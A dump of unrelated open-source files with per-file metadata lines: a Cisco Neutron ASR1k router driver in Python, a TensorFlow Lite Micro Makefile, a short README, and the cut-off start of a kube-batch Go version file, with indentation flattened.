}); | yicold/axure-case | caiqu/财趣v1.5/resources/screens/cd8b0318-8942-4a64-b2c9-ee7c253d6b7d-1445822636718.js | JavaScript | apache-2.0 | 13,587 |
# Copyright 2015 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
from sqlalchemy.orm import exc
from sqlalchemy.sql import expression as expr
from neutron.db import models_v2
from neutron.extensions import l3
from neutron_lib import constants as l3_constants
from neutron_lib import exceptions as n_exc
from networking_cisco._i18n import _, _LW
from networking_cisco import backwards_compatibility as bc
from networking_cisco.plugins.cisco.common import cisco_constants
from networking_cisco.plugins.cisco.db.l3 import ha_db
from networking_cisco.plugins.cisco.db.l3 import l3_models
from networking_cisco.plugins.cisco.db.l3.l3_router_appliance_db import (
L3RouterApplianceDBMixin)
from networking_cisco.plugins.cisco.extensions import routerhostingdevice
from networking_cisco.plugins.cisco.extensions import routerrole
from networking_cisco.plugins.cisco.extensions import routertype
from networking_cisco.plugins.cisco.extensions import routertypeawarescheduler
from networking_cisco.plugins.cisco.l3 import drivers
LOG = logging.getLogger(__name__)
DEVICE_OWNER_GLOBAL_ROUTER_GW = cisco_constants.DEVICE_OWNER_GLOBAL_ROUTER_GW
HOSTING_DEVICE_ATTR = routerhostingdevice.HOSTING_DEVICE_ATTR
ROUTER_ROLE_GLOBAL = cisco_constants.ROUTER_ROLE_GLOBAL
ROUTER_ROLE_LOGICAL_GLOBAL = cisco_constants.ROUTER_ROLE_LOGICAL_GLOBAL
ROUTER_ROLE_HA_REDUNDANCY = cisco_constants.ROUTER_ROLE_HA_REDUNDANCY
TENANT_HSRP_GRP_RANGE = 1
TENANT_HSRP_GRP_OFFSET = 1064
EXT_HSRP_GRP_RANGE = 1
EXT_HSRP_GRP_OFFSET = 1064
N_ROUTER_PREFIX = 'nrouter-'
DEV_NAME_LEN = 14
class TopologyNotSupportedByRouterError(n_exc.Conflict):
message = _("Requested topology cannot be supported by router.")
class ASR1kL3RouterDriver(drivers.L3RouterBaseDriver):
def create_router_precommit(self, context, router_context):
pass
def create_router_postcommit(self, context, router_context):
pass
def update_router_precommit(self, context, router_context):
pass
def update_router_postcommit(self, context, router_context):
# Whenever a gateway is added to, or removed from, a router hosted on
# a hosting device, we must ensure that a global router is running
# (for add operation) or not running (for remove operation) on that
# hosting device.
current = router_context.current
if current[HOSTING_DEVICE_ATTR] is None:
return
e_context = context.elevated()
if current['gw_port_id']:
self._conditionally_add_global_router(e_context, current)
else:
self._conditionally_remove_global_router(
e_context, router_context.original, True)
def delete_router_precommit(self, context, router_context):
pass
def delete_router_postcommit(self, context, router_context):
pass
def schedule_router_precommit(self, context, router_context):
pass
def schedule_router_postcommit(self, context, router_context):
# When the hosting device hosts a Neutron router with external
# connectivity, a "global" router (modeled as a Neutron router) must
# also run on the hosting device (outside of any VRF) to enable the
# connectivity.
current = router_context.current
if current['gw_port_id'] and current[HOSTING_DEVICE_ATTR] is not None:
self._conditionally_add_global_router(context.elevated(), current)
def unschedule_router_precommit(self, context, router_context):
pass
def unschedule_router_postcommit(self, context, router_context):
# When there is no longer any router with external gateway hosted on
# a hosting device, the global router on that hosting device can also
# be removed.
current = router_context.current
hd_id = current[HOSTING_DEVICE_ATTR]
if current['gw_port_id'] and hd_id is not None:
self._conditionally_remove_global_router(context.elevated(),
current)
def add_router_interface_precommit(self, context, r_port_context):
# Inside an ASR1k, VLAN sub-interfaces are used to connect to internal
# neutron networks. Only one such sub-interface can be created for each
# VLAN. As the VLAN sub-interface is added to the VRF representing the
# Neutron router, we must only allow one Neutron router to attach to a
# particular Neutron subnet/network.
if (r_port_context.router_context.current[routerrole.ROUTER_ROLE_ATTR]
== ROUTER_ROLE_HA_REDUNDANCY):
# redundancy routers can be exempt as we check the user visible
# routers and the request will be rejected there.
return
e_context = context.elevated()
if r_port_context.current is None:
sn = self._core_plugin.get_subnet(e_context,
r_port_context.current_subnet_id)
net_id = sn['network_id']
else:
net_id = r_port_context.current['network_id']
filters = {'network_id': [net_id],
'device_owner': [bc.constants.DEVICE_OWNER_ROUTER_INTF]}
for port in self._core_plugin.get_ports(e_context,
filters=filters):
router_id = port['device_id']
if router_id is None:
continue
router = self._l3_plugin.get_router(e_context, router_id)
if router[routerrole.ROUTER_ROLE_ATTR] is None:
raise TopologyNotSupportedByRouterError()
def add_router_interface_postcommit(self, context, r_port_context):
pass
def remove_router_interface_precommit(self, context, r_port_context):
pass
def remove_router_interface_postcommit(self, context, r_port_context):
pass
def create_floatingip_precommit(self, context, fip_context):
pass
def create_floatingip_postcommit(self, context, fip_context):
pass
def update_floatingip_precommit(self, context, fip_context):
pass
def update_floatingip_postcommit(self, context, fip_context):
pass
def delete_floatingip_precommit(self, context, fip_context):
pass
def delete_floatingip_postcommit(self, context, fip_context):
pass
def ha_interface_ip_address_needed(self, context, router, port,
ha_settings_db, ha_group_uuid):
if port['device_owner'] == bc.constants.DEVICE_OWNER_ROUTER_GW:
return False
else:
return True
def generate_ha_group_id(self, context, router, port, ha_settings_db,
ha_group_uuid):
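        # Derive a deterministic HSRP group id: gateway ports hash a slice of
        # the router name, other ports hash the leading network id digits.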
if port['device_owner'] in {bc.constants.DEVICE_OWNER_ROUTER_GW,
DEVICE_OWNER_GLOBAL_ROUTER_GW}:
ri_name = self._router_name(router['id'])[8:DEV_NAME_LEN]
group_id = int(ri_name, 16) % TENANT_HSRP_GRP_RANGE
group_id += TENANT_HSRP_GRP_OFFSET
return group_id
else:
net_id_digits = port['network_id'][:6]
group_id = int(net_id_digits, 16) % EXT_HSRP_GRP_RANGE
group_id += EXT_HSRP_GRP_OFFSET
return group_id
def pre_backlog_processing(self, context):
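        # Clean up global routers (and the logical global router) that no
        # longer serve any router with a gateway set on their hosting device.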
filters = {routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL]}
global_routers = self._l3_plugin.get_routers(context, filters=filters)
if not global_routers:
LOG.debug("There are no global routers")
return
for gr in global_routers:
filters = {
HOSTING_DEVICE_ATTR: [gr[HOSTING_DEVICE_ATTR]],
routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_HA_REDUNDANCY, None]
}
invert_filters = {'gw_port_id': [None]}
num_rtrs = self._l3_plugin.get_routers_count_extended(
context, filters=filters, invert_filters=invert_filters)
LOG.debug("Global router %(name)s[%(id)s] with hosting_device "
"%(hd)s has %(num)d routers with gw_port set on that "
"device",
{'name': gr['name'], 'id': gr['id'],
'hd': gr[HOSTING_DEVICE_ATTR], 'num': num_rtrs, })
if num_rtrs == 0:
LOG.warning(
_LW("Global router:%(name)s[id:%(id)s] is present for "
"hosting device:%(hd)s but there are no tenant or "
"redundancy routers with gateway set on that hosting "
"device. Proceeding to delete global router."),
{'name': gr['name'], 'id': gr['id'],
'hd': gr[HOSTING_DEVICE_ATTR]})
self._delete_global_router(context, gr['id'])
filters = {
#TODO(bmelande): Filter on routertype of global router
#routertype.TYPE_ATTR: [routertype_id],
routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]}
log_global_routers = self._l3_plugin.get_routers(
context, filters=filters)
if log_global_routers:
log_global_router_id = log_global_routers[0]['id']
self._delete_global_router(context, log_global_router_id,
logical=True)
def post_backlog_processing(self, context):
pass
# ---------------- Create workflow functions -----------------
def _conditionally_add_global_router(self, context, tenant_router):
# We could filter on hosting device id but we don't so we get all
# global routers for this router type. We can then use that count to
# determine which ha priority a new global router should get.
filters = {
routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]],
routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL]}
global_routers = self._l3_plugin.get_routers(
context, filters=filters)
hd_to_gr_dict = {r[HOSTING_DEVICE_ATTR]: r for r in global_routers}
hosting_device_id = tenant_router[HOSTING_DEVICE_ATTR]
ext_nw_id = tenant_router[l3.EXTERNAL_GW_INFO]['network_id']
global_router = hd_to_gr_dict.get(hosting_device_id)
logical_global_router = self._get_logical_global_router(context,
tenant_router)
self._conditionally_add_auxiliary_external_gateway_port(
context, logical_global_router, ext_nw_id, tenant_router, True)
if global_router is None:
# must create global router on hosting device
global_router = self._create_global_router(
context, hosting_device_id, hd_to_gr_dict, tenant_router,
logical_global_router)
self._conditionally_add_auxiliary_external_gateway_port(
context, global_router, ext_nw_id, tenant_router)
self._l3_plugin.add_type_and_hosting_device_info(context,
global_router)
for ni in self._l3_plugin.get_notifiers(context, [global_router]):
if ni['notifier']:
ni['notifier'].routers_updated(context, ni['routers'])
def _conditionally_add_auxiliary_external_gateway_port(
self, context, global_router, ext_net_id, tenant_router,
provision_ha=False, port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW):
        # the global router may or may not have an interface on the
        # external network that the tenant router uses
filters = {
'device_id': [global_router['id']],
'device_owner': [port_type]}
connected_nets = {
p['network_id']: p['fixed_ips'] for p in
self._core_plugin.get_ports(context, filters=filters)}
if ext_net_id in connected_nets:
# already connected to the external network so we're done
return
else:
# not connected to the external network, so let's fix that
aux_gw_port = self._create_auxiliary_external_gateway_port(
context, global_router, ext_net_id, tenant_router, port_type)
if provision_ha:
self._provision_port_ha(context, aux_gw_port, global_router)
def _create_auxiliary_external_gateway_port(
self, context, global_router, ext_net_id, tenant_router,
port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW):
# When a global router is connected to an external network then a
# special type of gateway port is created on that network. Such a
# port is called auxiliary gateway ports. It has an ip address on
# each subnet of the external network. A (logical) global router
# never has a traditional Neutron gateway port.
filters = {
'device_id': [tenant_router['id']],
'device_owner': [l3_constants.DEVICE_OWNER_ROUTER_GW]}
# fetch the gateway port of the *tenant* router so we can determine
# the CIDR of that port's subnet
gw_port = self._core_plugin.get_ports(context,
filters=filters)[0]
fixed_ips = self._get_fixed_ips_subnets(context, gw_port)
global_router_id = global_router['id']
with context.session.begin(subtransactions=True):
aux_gw_port = self._core_plugin.create_port(context, {
'port': {
'tenant_id': '', # intentionally not set
'network_id': ext_net_id,
'mac_address': bc.constants.ATTR_NOT_SPECIFIED,
'fixed_ips': fixed_ips,
'device_id': global_router_id,
'device_owner': port_type,
'admin_state_up': True,
'name': ''}})
router_port = bc.RouterPort(
port_id=aux_gw_port['id'],
router_id=global_router_id,
port_type=port_type)
context.session.add(router_port)
return aux_gw_port
def _create_global_router(
self, context, hosting_device_id, hd_to_gr_dict, tenant_router,
logical_global_router):
r_spec = {'router': {
# global routers are not tied to any tenant
'tenant_id': '',
'name': self._global_router_name(hosting_device_id),
'admin_state_up': True}}
global_router, r_hd_b_db = self._l3_plugin.do_create_router(
context, r_spec, tenant_router[routertype.TYPE_ATTR], False,
True, hosting_device_id, ROUTER_ROLE_GLOBAL)
# make the global router a redundancy router for the logical
# global router (which we treat as a hidden "user visible
# router" (how's that for a contradiction of terms! :-) )
with context.session.begin(subtransactions=True):
ha_priority = (
ha_db.DEFAULT_MASTER_PRIORITY -
len(hd_to_gr_dict) * ha_db.PRIORITY_INCREASE_STEP)
r_b_b = ha_db.RouterRedundancyBinding(
redundancy_router_id=global_router['id'],
priority=ha_priority,
user_router_id=logical_global_router['id'])
context.session.add(r_b_b)
return global_router
def _get_logical_global_router(self, context, tenant_router):
# Since HA is also enabled on the global routers on each hosting device
# those global routers need HA settings and VIPs. We represent that
# using a Neutron router that is never instantiated/hosted. That
# Neutron router is referred to as the "logical global" router.
filters = {routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]],
routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]}
logical_global_routers = self._l3_plugin.get_routers(
context, filters=filters)
if not logical_global_routers:
# must create logical global router
logical_global_router = self._create_logical_global_router(
context, tenant_router)
else:
logical_global_router = logical_global_routers[0]
self._update_ha_redundancy_level(context, logical_global_router, 1)
return logical_global_router
def _create_logical_global_router(self, context, tenant_router):
r_spec = {'router': {
# global routers are not tied to any tenant
'tenant_id': '',
'name': self._global_router_name('', logical=True),
'admin_state_up': True,
# set auto-schedule to false to keep this router un-hosted
routertypeawarescheduler.AUTO_SCHEDULE_ATTR: False}}
# notifications should never be sent for this logical router!
logical_global_router, r_hd_b_db = (
self._l3_plugin.do_create_router(
context, r_spec, tenant_router[routertype.TYPE_ATTR],
False, True, None, ROUTER_ROLE_LOGICAL_GLOBAL))
with context.session.begin(subtransactions=True):
r_ha_s_db = ha_db.RouterHASetting(
router_id=logical_global_router['id'],
ha_type=cfg.CONF.ha.default_ha_mechanism,
redundancy_level=1,
priority=ha_db.DEFAULT_MASTER_PRIORITY,
probe_connectivity=False,
probe_target=None,
probe_interval=None)
context.session.add(r_ha_s_db)
return logical_global_router
def _get_fixed_ips_subnets(self, context, gw_port):
nw = self._core_plugin.get_network(context, gw_port['network_id'])
subnets = [{'subnet_id': s} for s in nw['subnets']]
return subnets
def _provision_port_ha(self, context, ha_port, router, ha_binding_db=None):
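        # Record an HA group for the port, reusing the HA type from the
        # router's HA binding.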
ha_group_uuid = uuidutils.generate_uuid()
router_id = router['id']
with context.session.begin(subtransactions=True):
if ha_binding_db is None:
ha_binding_db = self._get_ha_binding(context, router_id)
group_id = self.generate_ha_group_id(
context, router,
{'device_owner': DEVICE_OWNER_GLOBAL_ROUTER_GW}, ha_binding_db,
ha_group_uuid)
r_ha_g = ha_db.RouterHAGroup(
id=ha_group_uuid,
tenant_id='',
ha_type=ha_binding_db.ha_type,
group_identity=group_id,
ha_port_id=ha_port['id'],
extra_port_id=None,
subnet_id=ha_port['fixed_ips'][0]['subnet_id'],
user_router_id=router_id,
timers_config='',
tracking_config='',
other_config='')
context.session.add(r_ha_g)
def _get_ha_binding(self, context, router_id):
with context.session.begin(subtransactions=True):
query = context.session.query(ha_db.RouterHASetting)
query = query.filter(
ha_db.RouterHASetting.router_id == router_id)
return query.first()
# ---------------- Remove workflow functions -----------------
def _conditionally_remove_global_router(self, context, tenant_router,
update_operation=False):
filters = {routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]],
routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL],
HOSTING_DEVICE_ATTR: [tenant_router[HOSTING_DEVICE_ATTR]]}
global_routers = self._l3_plugin.get_routers(context,
filters=filters)
hd_to_gr_dict = {r[HOSTING_DEVICE_ATTR]: r for r in global_routers}
if global_routers:
global_router_id = global_routers[0]['id']
if not tenant_router or not tenant_router[l3.EXTERNAL_GW_INFO]:
# let l3 plugin's periodic backlog processing take care of the
# clean up of the global router
return
ext_net_id = tenant_router[l3.EXTERNAL_GW_INFO]['network_id']
routertype_id = tenant_router[routertype.TYPE_ATTR]
hd_id = tenant_router[HOSTING_DEVICE_ATTR]
global_router = hd_to_gr_dict.get(hd_id)
port_deleted = self._conditionally_remove_auxiliary_gateway_port(
context, global_router_id, ext_net_id, routertype_id, hd_id,
update_operation)
if port_deleted is False:
                # since no auxiliary gateway port was deleted we can
                # abort now since the auxiliary gateway port count cannot
                # have reached zero
return
filters = {
'device_id': [global_router_id],
'device_owner': [DEVICE_OWNER_GLOBAL_ROUTER_GW]}
num_aux_gw_ports = self._core_plugin.get_ports_count(
context, filters=filters)
if num_aux_gw_ports == 0:
# global router not needed any more so we delete it
self._delete_global_router(context, global_router_id)
do_notify = False
else:
do_notify = True
# process logical global router to remove its port
self._conditionally_remove_auxiliary_gateway_vip_port(
context, ext_net_id, routertype_id)
self._l3_plugin.add_type_and_hosting_device_info(context,
global_router)
if do_notify is True:
for ni in self._l3_plugin.get_notifiers(context,
[global_router]):
if ni['notifier']:
ni['notifier'].routers_updated(context, ni['routers'])
def _conditionally_remove_auxiliary_gateway_port(
self, context, router_id, ext_net_id, routertype_id,
hosting_device_id, update_operation=False):
num_rtrs = self._get_gateway_routers_count(
context, ext_net_id, routertype_id, None, hosting_device_id)
if ((num_rtrs <= 1 and update_operation is False) or
(num_rtrs == 0 and update_operation is True)):
            # there are no tenant routers *on ext_net_id* that are serviced by
            # this global router so its aux gw port can be deleted
self._delete_auxiliary_gateway_ports(context, router_id,
ext_net_id)
return True
return False
def _conditionally_remove_auxiliary_gateway_vip_port(
self, context, ext_net_id, routertype_id):
filters = {routertype.TYPE_ATTR: [routertype_id],
routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]}
log_global_routers = self._l3_plugin.get_routers(context,
filters=filters)
if not log_global_routers:
return
self._update_ha_redundancy_level(context, log_global_routers[0], -1)
log_global_router_id = log_global_routers[0]['id']
num_global_rtrs = self._get_gateway_routers_count(
context, ext_net_id, routertype_id, ROUTER_ROLE_GLOBAL)
if num_global_rtrs == 0:
            # there are no global routers *on ext_net_id* that are serviced by
            # this logical global router so its aux gw VIP port can be deleted
self._delete_auxiliary_gateway_ports(context, log_global_router_id,
ext_net_id)
filters[routerrole.ROUTER_ROLE_ATTR] = [ROUTER_ROLE_GLOBAL]
total_num_global_rtrs = self._l3_plugin.get_routers_count(
context, filters=filters)
if total_num_global_rtrs == 0:
# there are no global routers left that are serviced by this
# logical global router so it can be deleted
self._delete_global_router(context, log_global_router_id, True)
return False
def _delete_auxiliary_gateway_ports(
self, context, router_id, net_id=None,
port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW):
filters = {
'device_id': [router_id],
'device_owner': [port_type]}
if net_id is not None:
filters['network_id'] = [net_id]
for port in self._core_plugin.get_ports(context, filters=filters):
try:
self._core_plugin.delete_port(context, port['id'],
l3_port_check=False)
except (exc.ObjectDeletedError, n_exc.PortNotFound) as e:
LOG.warning(e)
def _delete_global_router(self, context, global_router_id, logical=False):
# ensure we clean up any stale auxiliary gateway ports
self._delete_auxiliary_gateway_ports(context, global_router_id)
try:
if logical is True:
# We use parent class method as no special operations beyond
                # what the base implementation does are needed for logical
# global router
super(L3RouterApplianceDBMixin, self._l3_plugin).delete_router(
context, global_router_id)
else:
self._l3_plugin.delete_router(
context, global_router_id, unschedule=False)
except (exc.ObjectDeletedError, l3.RouterNotFound) as e:
LOG.warning(e)
def _get_gateway_routers_count(self, context, ext_net_id, routertype_id,
router_role, hosting_device_id=None):
# Determine number of routers (with routertype_id and router_role)
# that act as gateway to ext_net_id and that are hosted on
# hosting_device_id (if specified).
query = context.session.query(bc.Router)
if router_role in [None, ROUTER_ROLE_HA_REDUNDANCY]:
# tenant router roles
query = query.join(models_v2.Port,
models_v2.Port.id == bc.Router.gw_port_id)
role_filter = expr.or_(
l3_models.RouterHostingDeviceBinding.role == expr.null(),
l3_models.RouterHostingDeviceBinding.role ==
ROUTER_ROLE_HA_REDUNDANCY)
else:
# global and logical global routers
query = query.join(models_v2.Port,
                               models_v2.Port.device_id == bc.Router.id)
role_filter = (
l3_models.RouterHostingDeviceBinding.role == router_role)
query = query.join(
l3_models.RouterHostingDeviceBinding,
l3_models.RouterHostingDeviceBinding.router_id == bc.Router.id)
query = query.filter(
role_filter,
models_v2.Port.network_id == ext_net_id,
l3_models.RouterHostingDeviceBinding.router_type_id ==
routertype_id)
if hosting_device_id is not None:
query = query.filter(
l3_models.RouterHostingDeviceBinding.hosting_device_id ==
hosting_device_id)
return query.count()
# ---------------- General support functions -----------------
def _update_ha_redundancy_level(self, context, logical_global_router,
delta):
with context.session.begin(subtransactions=True):
log_g_router_db = self._l3_plugin._get_router(
context, logical_global_router['id'])
log_g_router_db.ha_settings.redundancy_level += delta
context.session.add(log_g_router_db.ha_settings)
def _router_name(self, router_id):
return N_ROUTER_PREFIX + router_id
def _global_router_name(self, hosting_device_id, logical=False):
if logical is True:
return cisco_constants.LOGICAL_ROUTER_ROLE_NAME
else:
return '%s-%s' % (cisco_constants.ROUTER_ROLE_NAME_PREFIX,
hosting_device_id[-cisco_constants.ROLE_ID_LEN:])
@property
def _core_plugin(self):
return bc.get_plugin()
@property
def _l3_plugin(self):
return bc.get_plugin(bc.constants.L3)
| Gitweijie/first_project | networking_cisco/plugins/cisco/l3/drivers/asr1k/asr1k_routertype_driver.py | Python | apache-2.0 | 29,107 |
MAKEFILE_DIR := tensorflow/lite/experimental/micro/tools/make
# Pull in some convenience functions.
include $(MAKEFILE_DIR)/helper_functions.inc
# Try to figure out the host system
HOST_OS :=
ifeq ($(OS),Windows_NT)
HOST_OS = windows
else
UNAME_S := $(shell uname -s)
ifeq ($(UNAME_S),Linux)
HOST_OS := linux
endif
ifeq ($(UNAME_S),Darwin)
HOST_OS := osx
endif
endif
HOST_ARCH := $(shell if [[ $(shell uname -m) =~ i[345678]86 ]]; then echo x86_32; else echo $(shell uname -m); fi)
# Override these on the make command line to target a specific architecture. For example:
# make -f tensorflow/lite/experimental/micro/tools/make/Makefile TARGET=rpi TARGET_ARCH=armv7l
TARGET := $(HOST_OS)
TARGET_ARCH := $(HOST_ARCH)
# Specify TAGS on the command line to add a particular set of specialized
# implementations, for example TAGS="CMSIS disco_f746ng" to target a Discovery
# STM32F746NG board, using the CMSIS library's implementations where possible.
ALL_TAGS := $(TAGS) $(TARGET)
INCLUDES := \
-I. \
-I$(MAKEFILE_DIR)/../../../../../ \
-I$(MAKEFILE_DIR)/../../../../../../ \
-I$(MAKEFILE_DIR)/../../../../../../../ \
-I$(MAKEFILE_DIR)/downloads/ \
-I$(MAKEFILE_DIR)/downloads/gemmlowp \
-I$(MAKEFILE_DIR)/downloads/flatbuffers/include \
-I$(OBJDIR)
# This is at the end so any globally-installed frameworks like protobuf don't
# override local versions in the source tree.
INCLUDES += -I/usr/local/include
TEST_SCRIPT := tensorflow/lite/experimental/micro/testing/test_linux_binary.sh
MICROLITE_LIBS := -lm
# There are no rules for compiling objects for the host system (since we don't
# generate things like the protobuf compiler that require that), so all of
# these settings are for the target compiler.
CXXFLAGS := -O3 -DNDEBUG
CXXFLAGS += --std=c++11 -g -DTF_LITE_STATIC_MEMORY
CCFLAGS := -DNDEBUG -g -DTF_LITE_STATIC_MEMORY
LDOPTS := -L/usr/local/lib
ARFLAGS := -r
TARGET_TOOLCHAIN_PREFIX :=
CC_PREFIX :=
# This library is the main target for this makefile. It will contain a minimal
# runtime that can be linked in to other programs.
MICROLITE_LIB_NAME := libtensorflow-microlite.a
MICROLITE_TEST_SRCS := \
$(wildcard tensorflow/lite/experimental/micro/*test.cc) \
$(wildcard tensorflow/lite/experimental/micro/kernels/*test.cc)
MICROLITE_TEST_HDRS := \
$(wildcard tensorflow/lite/experimental/micro/testing/*.h)
MICROLITE_CC_BASE_SRCS := \
$(wildcard tensorflow/lite/experimental/micro/*.cc) \
$(wildcard tensorflow/lite/experimental/micro/kernels/*.cc) \
tensorflow/lite/c/c_api_internal.c \
tensorflow/lite/core/api/error_reporter.cc \
tensorflow/lite/core/api/flatbuffer_conversions.cc \
tensorflow/lite/core/api/op_resolver.cc \
tensorflow/lite/kernels/kernel_util.cc \
tensorflow/lite/kernels/internal/quantization_util.cc
MICROLITE_CC_SRCS := $(filter-out $(MICROLITE_TEST_SRCS), $(MICROLITE_CC_BASE_SRCS))
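# Let platform/tag-specific implementations replace the reference sources.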
MICROLITE_CC_SRCS := $(call specialize,$(MICROLITE_CC_SRCS))
MICROLITE_CC_HDRS := \
$(wildcard tensorflow/lite/experimental/micro/*.h) \
$(wildcard tensorflow/lite/experimental/micro/kernels/*.h) \
LICENSE \
tensorflow/lite/c/c_api_internal.h \
tensorflow/lite/c/builtin_op_data.h \
tensorflow/lite/core/api/error_reporter.h \
tensorflow/lite/core/api/flatbuffer_conversions.h \
tensorflow/lite/core/api/op_resolver.h \
tensorflow/lite/kernels/kernel_util.h \
tensorflow/lite/kernels/op_macros.h \
tensorflow/lite/kernels/padding.h \
tensorflow/lite/kernels/internal/common.h \
tensorflow/lite/kernels/internal/compatibility.h \
tensorflow/lite/kernels/internal/reference/depthwiseconv_float.h \
tensorflow/lite/kernels/internal/reference/depthwiseconv_uint8.h \
tensorflow/lite/kernels/internal/reference/fully_connected.h \
tensorflow/lite/kernels/internal/reference/softmax.h \
tensorflow/lite/kernels/internal/round.h \
tensorflow/lite/kernels/internal/tensor_ctypes.h \
tensorflow/lite/kernels/internal/types.h \
tensorflow/lite/kernels/internal/quantization_util.h \
tensorflow/lite/schema/schema_generated.h \
tensorflow/lite/version.h
THIRD_PARTY_CC_HDRS := \
third_party/gemmlowp/fixedpoint/fixedpoint.h \
third_party/gemmlowp/fixedpoint/fixedpoint_sse.h \
third_party/gemmlowp/internal/detect_platform.h \
third_party/gemmlowp/LICENSE \
third_party/flatbuffers/include/flatbuffers/base.h \
third_party/flatbuffers/include/flatbuffers/stl_emulation.h \
third_party/flatbuffers/include/flatbuffers/flatbuffers.h \
third_party/flatbuffers/LICENSE.txt
MAKE_PROJECT_FILES := \
README_MAKE.md \
Makefile
MBED_PROJECT_FILES := \
README_MBED.md \
mbed-os.lib \
mbed_app.json
# These target-specific makefiles should modify or replace options like
# CXXFLAGS or LIBS to work for a specific targeted architecture. All logic
# based on platforms or architectures should happen within these files, to
# keep this main makefile focused on the sources and dependencies.
include $(wildcard $(MAKEFILE_DIR)/targets/*_makefile.inc)
ALL_TAGS += $(TARGET_ARCH)
ALL_SRCS := \
$(MICROLITE_CC_SRCS) \
$(MICROLITE_TEST_SRCS)
# Where compiled objects are stored.
GENDIR := $(MAKEFILE_DIR)/gen/$(TARGET)_$(TARGET_ARCH)/
OBJDIR := $(GENDIR)obj/
BINDIR := $(GENDIR)bin/
LIBDIR := $(GENDIR)lib/
PRJDIR := $(GENDIR)prj/
MICROLITE_LIB_PATH := $(LIBDIR)$(MICROLITE_LIB_NAME)
CXX := $(CC_PREFIX)${TARGET_TOOLCHAIN_PREFIX}g++
CC := $(CC_PREFIX)${TARGET_TOOLCHAIN_PREFIX}gcc
AR := $(CC_PREFIX)${TARGET_TOOLCHAIN_PREFIX}ar
# Load the examples.
include $(wildcard tensorflow/lite/experimental/micro/examples/*/Makefile.inc)
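# Object files for the microlite library, mirroring the source tree in OBJDIR.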
MICROLITE_LIB_OBJS := $(addprefix $(OBJDIR), \
$(patsubst %.cc,%.o,$(patsubst %.c,%.o,$(MICROLITE_CC_SRCS))))
MICROLITE_TEST_TARGETS := $(addprefix $(BINDIR), \
$(patsubst %_test.cc,%.test_target,$(MICROLITE_TEST_SRCS)))
# For normal manually-created TensorFlow C++ source files.
$(OBJDIR)%.o: %.cc
@mkdir -p $(dir $@)
$(CXX) $(CXXFLAGS) $(INCLUDES) -c $< -o $@
# For normal manually-created TensorFlow C source files.
$(OBJDIR)%.o: %.c
@mkdir -p $(dir $@)
$(CC) $(CCFLAGS) $(INCLUDES) -c $< -o $@
# For normal manually-created TensorFlow ASM source files.
$(OBJDIR)%.o: %.S
@mkdir -p $(dir $@)
$(CC) $(CCFLAGS) $(INCLUDES) -c $< -o $@
# The target that's compiled if there's no command-line arguments.
all: $(MICROLITE_LIB_PATH)
microlite: $(MICROLITE_LIB_PATH)
# Hack for generating schema file bypassing flatbuffer parsing
tensorflow/lite/schema/schema_generated.h:
@cp -u tensorflow/lite/schema/schema_generated.h.OPENSOURCE tensorflow/lite/schema/schema_generated.h
# Gathers together all the objects we've compiled into a single '.a' archive.
$(MICROLITE_LIB_PATH): tensorflow/lite/schema/schema_generated.h $(MICROLITE_LIB_OBJS)
@mkdir -p $(dir $@)
$(AR) $(ARFLAGS) $(MICROLITE_LIB_PATH) $(MICROLITE_LIB_OBJS)
$(BINDIR)%_test : $(OBJDIR)%_test.o $(MICROLITE_LIB_PATH)
@mkdir -p $(dir $@)
$(CXX) $(CXXFLAGS) $(INCLUDES) \
-o $@ $< \
$(LIBFLAGS) $(MICROLITE_LIB_PATH) $(LDFLAGS) $(MICROLITE_LIBS)
$(BINDIR)%.test_target: $(BINDIR)%_test
$(TEST_SCRIPT) $< '~~~ALL TESTS PASSED~~~'
# Generate standalone makefile projects for all of the test targets.
$(foreach TEST_TARGET,$(MICROLITE_TEST_SRCS),\
$(eval $(call microlite_test,$(notdir $(basename $(TEST_TARGET))),$(TEST_TARGET))))
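# Runs the micro speech example test plus all of the microlite unit tests.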
test: test_micro_speech $(MICROLITE_TEST_TARGETS)
# Gets rid of all generated files.
clean:
rm -rf $(MAKEFILE_DIR)/gen
$(DEPDIR)/%.d: ;
.PRECIOUS: $(DEPDIR)/%.d
.PRECIOUS: $(BINDIR)%_test
-include $(patsubst %,$(DEPDIR)/%.d,$(basename $(ALL_SRCS)))
| gautam1858/tensorflow | tensorflow/lite/experimental/micro/tools/make/Makefile | Makefile | apache-2.0 | 7,400 |
# aitproject | tushargosavi/aitproject | README.md | Markdown | apache-2.0 | 12 |
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package version
import (
"fmt"
"os"
"runtime"
)
var (
	// Version shows the version of kube-batch.
Version = "Not provided."
	// GitSHA shows the git commit id of kube-batch.
GitSHA = "Not provided."
// Built shows the built time of the binary.
Built = "Not provided."
)
// PrintVersionAndExit prints versions from the array returned by Info() and exit
func PrintVersionAndExit(apiVersion string) {
for _, i := range Info(apiVersion) {
fmt.Printf("%v\n", i)
}
os.Exit(0)
}
// Info returns an array of various service versions
func Info(apiVersion string) []string {
